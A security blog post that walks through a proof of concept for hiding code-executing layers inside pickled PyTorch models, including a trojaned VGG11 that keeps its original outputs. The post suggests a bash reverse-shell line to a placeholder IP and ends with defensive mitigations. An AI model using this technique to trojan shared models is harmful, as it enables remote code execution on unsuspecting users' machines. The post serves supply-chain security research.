As I learn about ML security and think through its threat models, one of the ideas I find most intriguing is the concept of Models as Code. Models are large, serialized files shared by internal ML teams and through public repos like [PyTorch Hub](https://github.com/pytorch/hub) or [Huggingface Hub](https://github.com/huggingface/huggingface_hub), written to run on user machines or shared notebook servers, in development environments and in production. This usage pattern introduces significant risk into the supply chain. As a security engineer I have a lot of experience with this class of issues; every company I have ever worked for was, smartly, working on securing its software package ecosystem. I immediately started searching for proof-of-concept remote code execution attacks. I was not able to find any good articles, so I loaded up VS Code and tried to write the code myself. My objective is to insert malicious code into an existing model that a victim would trigger when loading and running the model.

## Loading a Model

First let's see how we would load and use a model:

```python
import torch

# Load a pytorch model from a hub repo (a GitHub "owner/repo" or a local directory)
model = torch.hub.load('owner/repo', 'model_name')

# Or download a serialized model file directly
torch.hub.download_url_to_file(
    'https://s3.amazonaws.com/models/resnet18-5c106cde.pth',
    '/tmp/temporary_file')

# Load a pickled pytorch model from disk
model = torch.load('locals/model.pt')

# Save a pytorch model to disk
torch.save(model, 'locals/model.pt')
```

Review the official [saving and loading documentation](https://pytorch.org/tutorials/beginner/basics/saveloadrun_tutorial.html) for more information. For our current project we only need to know two things: models can be loaded from anywhere, from the local filesystem to S3 buckets, and `torch.save` on a model is equivalent to serializing the entire `nn.Module` object with Pickle and writing it to disk.

## Model Architecture

Model architecture is a complex subject that I will not go into here; for our purposes we can think of architecture as how we define all the layers in our network and how those layers interact with each other. The fundamental structure of a PyTorch model is a class with an `__init__` method, where we define the layers, and a `forward()` method, which describes how the input is propagated through those layers. The `__init__` method is invoked when you create an instance of the `nn.Module`; this is where you define the parameters of each layer, such as the number of filters and the kernel size for a convolutional layer, or the dropout probability for a dropout layer. The `forward()` function is where you define how your output is computed. It doesn't need to be called explicitly: it runs whenever you call the `nn.Module` instance like a function, with the input as its argument.
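For example, a minimal skeleton might look like the following. This is only an illustration; the `SimpleNet` name and the specific layer choices are placeholders, not taken from any real model:

```python
import torch
import torch.nn as nn

class SimpleNet(nn.Module):
    def __init__(self):
        super().__init__()
        # layers and their parameters are defined here
        self.conv = nn.Conv2d(in_channels=1, out_channels=8, kernel_size=3)
        self.dropout = nn.Dropout(p=0.5)
        self.fc = nn.Linear(8 * 26 * 26, 10)

    def forward(self, x):
        # how the input flows through the defined layers
        x = torch.relu(self.conv(x))
        x = self.dropout(x)
        x = torch.flatten(x, 1)
        return self.fc(x)

# calling the instance runs forward() on the input
model = SimpleNet()
output = model(torch.rand(1, 1, 28, 28))
```

The important point for what follows is that `forward()` is plain Python: whatever we put in it runs every time the model is called.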
Let's create a simple example in which we initialize an `nn.Sequential()` base model, add an `ExploitLayer` with a special `exploit()` function that creates a file on the system, and then save the model:

```python
import torch
import torch.nn as nn

class ExploitLayer(nn.Module):
    def __init__(self):
        super(ExploitLayer, self).__init__()

    def forward(self, x):
        print('forward() function called')
        self.exploit()
        return x

    def exploit(self):
        import os
        os.system("touch pwned")

# create a model
model = nn.Sequential()

# add a malicious layer
model.add_module('exploit', ExploitLayer())

# call forward() on the model to create the model graph
x = torch.rand(1, 28, 28)
model(x)

# save the model
torch.save(model, 'exploit-model.pt')
```

We can now pass the model around and have it execute on any developer's machine simply by loading and calling it:

```python
model = torch.load('exploit-model.pt')
x = torch.rand(1, 28, 28)
model(x)
```

## RCE on an Existing Model

It is easy to create a contrived example, so let's attempt to insert a malicious layer into an existing, legitimate model. It is important that our modified model produces the same results as the original so that nobody notices. I searched the PyTorch hub repo and picked the simple [vgg11 vision model](https://pytorch.org/hub/pytorch_vision_vgg/). This example code was taken directly from the readme:

```python
import torch
model = torch.hub.load('pytorch/vision:v0.10.0', 'vgg11', pretrained=True)
model.eval()

# Download an example image from the pytorch website
import urllib
url, filename = ("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg")
try: urllib.URLopener().retrieve(url, filename)
except: urllib.request.urlretrieve(url, filename)

# sample execution
from PIL import Image
from torchvision import transforms
input_image = Image.open(filename)
preprocess = transforms.Compose([
    transforms.Resize(256),
    transforms.CenterCrop(224),
    transforms.ToTensor(),
    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
input_tensor = preprocess(input_image)
input_batch = input_tensor.unsqueeze(0)  # create a mini-batch as expected by the model

model(input_batch)
```

Running that code produces the following output:

```txt
tensor([[-1.4892e+00, -1.6809e+00, -1.2466e+00, -2.5329e+00, -1.5367e+00,
         -1.1485e+00, -1.5428e+00,  2.6894e+00,  4.0779e+00, -2.7479e+00,
         -4.7201e+00, -2.7696e+00, -4.5199e+00, -3.2565e+00, -2.7174e+00,
         ...
```

Now we must figure out how to insert the `ExploitLayer` into our model and save it. I experimented with several approaches, in particular `add_module()`, but that was not triggering our forward() function. After much research I found that, to ensure the `ExploitLayer` is always called when running the model, you need to insert it into the forward pass. In our example, with VGG11 as the base model, that means subclassing the VGG model and overriding its `forward` function to include the `ExploitLayer`.
```python
import torch
import torch.nn as nn

# load the legitimate model
model = torch.hub.load('pytorch/vision:v0.10.0', 'vgg11', pretrained=True)
model.eval()

class ExploitLayer(nn.Module):
    def __init__(self):
        super(ExploitLayer, self).__init__()

    def forward(self, x):
        print('forward() function called')
        return self.exploit(x)

    def exploit(self, x):
        import os
        os.system("touch pwned")
        return x

# subclass and override the forward() function
class VGGWithExploit(nn.Module):
    def __init__(self, model, exploit_layer):
        super(VGGWithExploit, self).__init__()
        self.features = model.features
        self.avgpool = model.avgpool
        self.classifier = model.classifier
        self.exploit_layer = exploit_layer

    def forward(self, x):
        x = self.features(x)
        x = self.avgpool(x)
        x = torch.flatten(x, 1)
        x = self.exploit_layer(x)  # call the exploit layer here
        x = self.classifier(x)
        return x

# create the model with the exploit layer
exploit_layer = ExploitLayer()
exploit_model = VGGWithExploit(model, exploit_layer)

# test the model
x = torch.randn(1, 3, 224, 224)
output = exploit_model(x)

# save the model
torch.save(exploit_model, 'visionmodel.pt')
```

If you're following along in your IDE, you will have seen that running this successfully created a `pwned` file and saved the model. To test whether our model works the same as before, we run the same VGG sample code, only loading our malicious model instead:

```python
import torch
model = torch.load('visionmodel.pt')
model.eval()

# Download an example image from the pytorch website
import urllib
url, filename = ("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg")
try: urllib.URLopener().retrieve(url, filename)
except: urllib.request.urlretrieve(url, filename)

# sample execution
from PIL import Image
from torchvision import transforms
input_image = Image.open(filename)
preprocess = transforms.Compose([
    transforms.Resize(256),
    transforms.CenterCrop(224),
    transforms.ToTensor(),
    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
input_tensor = preprocess(input_image)
input_batch = input_tensor.unsqueeze(0)  # create a mini-batch as expected by the model

model(input_batch)
```

As we can see after running it, our debugging forward() print and the file creation worked, but more importantly the results are identical to the untainted example. The model would work exactly as intended.

```txt
forward() function called
tensor([[-1.4892e+00, -1.6809e+00, -1.2466e+00, -2.5329e+00, -1.5367e+00,
         -1.1485e+00, -1.5428e+00,  2.6894e+00,  4.0779e+00, -2.7479e+00,
         -4.7201e+00, -2.7696e+00, -4.5199e+00, -3.2565e+00, -2.7174e+00,
         ...
```

We should also note this is just one proof of concept. I would remove the forward() print statement and replace the `os.system()` call with something like `/bin/bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1` to spawn a reverse shell, or with something less detectable than touching the filesystem. The fact of the matter is that our options are nearly unlimited: PyTorch code can read and write files, send and receive data over the network, and even spawn additional processes, and all of these tasks are performed with the permissions of the PyTorch process.

# Conclusion and Next Steps

We were able to insert code and execute it by calling the model. This was a very simple and detectable PoC: adding a `print(model)` line would show the following in the output: `(exploit_layer): ExploitLayer()`. A skilled attacker would obfuscate the name and attempt to hide the code.
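To make that detection point concrete, here is a quick check a reviewer might run; it simply enumerates the submodules of the loaded model without calling it, so in this PoC (where the payload only fires inside `forward()`) it does not trigger the exploit. Keep in mind that `torch.load()` still unpickles the file, so this is a sanity check, not a safe way to handle a model you truly distrust:

```python
import torch

# Load the suspect model and list its submodules without running a forward pass.
model = torch.load('visionmodel.pt')

for name, module in model.named_modules():
    if name:  # skip the unnamed root module
        print(name, type(module).__name__)

# Among the expected Conv2d/ReLU/MaxPool2d/Dropout/Linear entries, the injected
# layer stands out as:
#   exploit_layer ExploitLayer
```

Of course, a careful attacker would just give the layer an innocuous name, so a listing like this only catches the laziest tampering.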
This is an open area of research that I would like to dive deeper into, particularly when combined with research like [this paper](https://arxiv.org/abs/2204.06974) on planting undetectable backdoors in ML models. It seems entirely feasible to hide nearly undetectable malicious code in these models. I will add that to the 'research later' list for now.

## Mitigations

The core idea here is that the set of computation primitives available to PyTorch is powerful enough that you should assume the PyTorch process effectively executes arbitrary code. The mitigations we should take to lower the risk are basic secure computing practices:

* The environment should run with the lowest privileges possible; don't run your notebooks with sudo.
* Your team should also **always** execute untrusted models inside a sandbox like [nsjail](https://github.com/google/nsjail).
* Your networks should be properly segregated and segmented, follow the principle of least privilege, and have a well-defined auth process.
* Your team should expend significant effort to keep track of the model supply chain, perhaps with a designated model repo.
* Invest in developer education: models are code, and we shouldn't run anything we find outside of our designated safe repository.

Thanks and see you again soon!